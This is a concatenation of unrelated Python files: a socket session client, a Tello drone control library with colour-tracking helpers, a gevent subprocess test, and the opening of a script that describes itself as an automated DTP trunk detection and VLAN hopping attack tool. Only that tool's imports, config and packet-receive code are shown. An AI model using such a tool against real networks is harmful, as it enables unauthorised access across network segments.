if ready[0]:
data_r= s.recv(1024)
if data_r.decode().strip() == "":
return
prGreen(data_r.decode())
if data_r.decode().startswith('Client is stopping,'):
return
break
# else:
# print("No response, maybe client is disconnected, please close this session if client is not running")
while True:
data_r = s.recv(1024)
if data_r.decode().strip() == "":
return
prGreen(data_r.decode())
if data_r.decode().startswith('Client is stopping,'):
return
def send_data():
global t1
while (t1.isAlive()):
i, o, e = select.select( [sys.stdin], [], [], 1 )
if i:
str_in = sys.stdin.readline().strip()
s.send(str_in.encode())
else:
pass
def signal_handler(sig, frame):
print("Force exit")
pid = os.getpid()
os.kill(pid, signal.SIGKILL)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
# signal.signal(signal.SIGKILL, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', help='device name',
required=True)
parser.add_argument('-sk', '--secret_key', help='secret key',
required=True)
parser.add_argument('-s', '--session', help='session type')
args = parser.parse_args()
device = args.device
secret_key = args.secret_key
session_type = args.session or 'csh'
device = device.strip()
s = socket.socket()
while 1:
try:
with open('server_data.json', 'r') as f1:
server_data = json.load(f1)
port = server_data[device]
s.connect(('localhost', int(port)))
# print("connected")
s.send((session_type + ":" + secret_key).encode())
# print("first message is sent")
break
except:
# print("client is not connected or server is not running, retrying after 2s")
time.sleep(2)
ready = select.select([s], [], [], 5)
if ready[0]:
data_rec = s.recv(1024)
if data_rec.decode().strip() == "wrong secret key":
print("incorrect secret")
sys.exit(0)
else:
# print("Secret matched, client is authenticated")
pass
else:
# print("No response, maybe server is not running")
sys.exit(0)
t1 = threading.Thread(target=receive_data)
t1.start()
t2 = threading.Thread(target=send_data)
t2.start()
if session_type == "csh":
print("$ "),
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import imutils
import cv2
import pygame
import numpy as np
from enum import IntEnum
from threading import Thread
from djitellopy.decorators import accepts
from djitellopy.game_events import GameEvents
class State(IntEnum):
idle = 0
yawing = 1
flipping = 2
initializing = 10
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 10 # in seconds
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.WARNING)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
STATE_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
stream_on = False
def __init__(self,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=True,
retry_count=10):
self.address = (host, port)
self.response = None
self.response_state = None #to attain the response of the states
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
self.idle = State.idle
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(
socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(
('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.stateSocket.bind(
('', self.STATE_UDP_PORT)) # for accessing the states of Tello
# Run tello udp receiver on background
thread1 = threading.Thread(target=self.run_udp_receiver, args=())
# Run state reciever on background
thread2 = threading.Thread(target=self.get_states, args=())
thread1.daemon = True
thread2.daemon = True
thread1.start()
thread2.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(
1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_states(self):
"""This runs on background to recieve the state of Tello"""
while True:
try:
self.response_state, _ = self.stateSocket.recvfrom(128)
except Exception as e:
self.LOGGER.error(e)
break
def get_current_state_all(self):
"""Call this function to attain the states of Tello"""
if self.response_state == 'ok':
return False
else:
return self.response_state.decode('ASCII')
def get_pitch(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[1])
except:
print("Exception in pitch occured")
return 0
def get_roll(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[3])
except:
print("Exception in roll occured")
return 0
def get_yaw(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[5])
except:
print("Exception in yaw occured")
return 0
def get_vgx(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[7])
except:
print("Exception in velocity in x occured")
return 0
def get_vgy(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[9])
except:
print("Exception in velocity in y occured")
return 0
def get_vgz(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[11])
except:
print("Exception in velocity in z occured")
return 0
def get_agx(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[27])
except:
print("Exception in acceleration in x")
return 0
def get_agy(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[29])
except:
print("Exception in acceleration in y")
return 0
def get_agz(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[31])
except:
print("Exception in acceleration in z")
return 0
def get_h(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[19])
except:
print("Exception in height")
return 0
def get_bat(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[21])
except:
print("Exception in battery")
return 50
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(
self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(
self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str)
def send_command_with_return(self, command):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
self.LOGGER.debug('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.LOGGER.debug('Response: ' + response)
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false.
x/y/z can’t be between -20 – 20 at the same time .
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.debug('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str)
def send_control_command(self, command):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
self.LOGGER.debug(command)
for i in range(0, self.retry_count):
response = self.send_command_with_return(command)
if response == 'OK' or response == 'ok':
return True
elif self.is_moving():
return True
time.sleep(0.2)
return self.return_error_on_send_command(command, response,
self.enable_exceptions)
@accepts(command=str)
def send_read_command(self, command):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and (
'False' not in response):
if response.isdigit():
return int(response)
else:
try:
return float(
response
) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
return self.return_error_on_send_command(command, response,
self.enable_exceptions)
@classmethod
def return_error_on_send_command(cl, command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(
response)
if enable_exceptions:
raise Exception(msg)
else:
cl.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
return self.send_control_command("takeoff")
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("land")
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return(
'go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
- If the arc radius is not within the range of 0.5-10 meters, it responses false.
- x/y/z can’t be between -20 – 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return(
'curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(
'go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(
x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' %
(x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(
'jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(
left_right_velocity=int,
forward_backward_velocity=int,
up_down_velocity=int,
yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity,
up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(
time.time() * 1000
) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return(
'rc %s %s %s %s' % (left_right_velocity,
forward_backward_velocity,
up_down_velocity, yaw_velocity))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
int: -100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
r = self.send_read_command('attitude?').replace(';', ':').split(':')
return dict(
zip(r[::2],
[int(i)
for i in r[1::2]])) # {'pitch': xxx, 'roll': xxx, 'yaw': xxx}
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def is_idle(self):
return self.get_speed() > 0
def is_moving(self):
return not self.is_idle()
def end(self):
"""Call this method when you want to end the tello object"""
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
def __del__(self):
self.end()
def detectRosePaper(frame) -> bool:
# define the lower and upper boundaries of the "green"
# ball in the HSV color space
greenLower = (157, 82, 89)
greenUpper = (173, 190, 225)
# frame = imutils.resize(frame, width=600)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(
mask.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE
)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 40:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(
frame,
(int(x), int(y)),
int(radius),
(0, 255, 255),
2
)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
return True
return False
def calculateAnchor(frame):
greenLower = (157, 82, 89)
greenUpper = (173, 190, 225)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(
mask.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE
)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask
c = max(cnts, key=cv2.contourArea)
_, radius = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 20:
return center
return None
def getDirectionFromPoints(points):
directions = []
if len(points) < 10:
return directions
# if either of the tracked points are None, ignore
# them
if points[0] is None or points[1] is None or points[-10] is None:
return directions
# compute the difference between the x and y
# coordinates and re-initialize the direction
# text variables
dX = points[-10][0] - points[0][0]
dY = points[-10][1] - points[0][1]
direction = ""
# ensure there is significant movement in the
# x-direction
if np.abs(dX) >= np.abs(dY):
if np.abs(dX) > 20:
direction = "East" if np.sign(dX) == 1 else "West"
elif np.abs(dY) > 20:
direction = "North" if np.sign(dY) == 1 else "South"
return direction
def most_common(lst):
cleared = [elem for elem in lst if elem != '']
if not len(cleared) > 0:
return ''
return max(set(cleared), key=lst.count)
def getDirectionForDrone(directions):
direction = ""
if {'North', 'East', 'West', 'South'}.issubset(set(directions)):
direction = 'Circle'
else:
direction = most_common(directions)
return direction
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the
actual one.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger(self.__class__.__name__)
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
self.LOGGER = LOGGER
self.random_counter = 0
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
# cap is an opencv video capture
(self.grabbed, self.frame) = self.cap.read()
detected = detectRosePaper(self.frame)
if detected:
self.update_command({'detected': True})
# add filter and then on event trigger update_command
# update_command with the parameters
# once the command is sent, you can retrieve it in the main loop
def update_command(self, command_parameter):
video_event = pygame.event.Event(GameEvents.VIDEO_EVENT.value,
command_parameter)
pygame.event.post(video_event)
def stop(self):
self.stopped = True
|
test__issue600.py
|
# Make sure that libev child watchers, implicitly installed through the use
# of subprocess, do not cause waitpid() to fail to poll for processes.
# NOTE: This was only reproducible under python 2.
from __future__ import print_function
import gevent
from gevent import monkey
monkey.patch_all()
import sys
from multiprocessing import Process
from subprocess import Popen, PIPE
import greentest
def f(sleep_sec):
gevent.sleep(sleep_sec)
class TestIssue600(greentest.TestCase):
__timeout__ = greentest.LARGE_TIMEOUT
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_invoke(self):
# Run a subprocess through Popen to make sure
# libev is handling SIGCHLD. This could *probably* be simplified to use
# just hub.loop.install_sigchld
p = Popen([sys.executable, '-V'], stdout=PIPE, stderr=PIPE)
gevent.sleep(0)
p.communicate()
gevent.sleep(0)
def test_process(self):
# Launch
p = Process(target=f, args=(0.5,))
p.start()
with gevent.Timeout(3):
# Poll for up to 10 seconds. If the bug exists,
# this will timeout because our subprocess should
# be long gone by now
p.join(10)
if __name__ == '__main__':
greentest.main()
|
VLANHopperDTP.py
|
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# To be launched only in Unix/Linux environment as the script utilizes
# following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# Python requirements:
# - scapy
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
#
# Mariusz B. / mgeeky, '18, <[email protected]>
#
import os
import re
import sys
import socket
import struct
import textwrap
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4'
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
subinterfaces = set()
cdpsCollected = set()
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.retype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
raise RuntimeError("recvmsg failed: rv=%d", rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
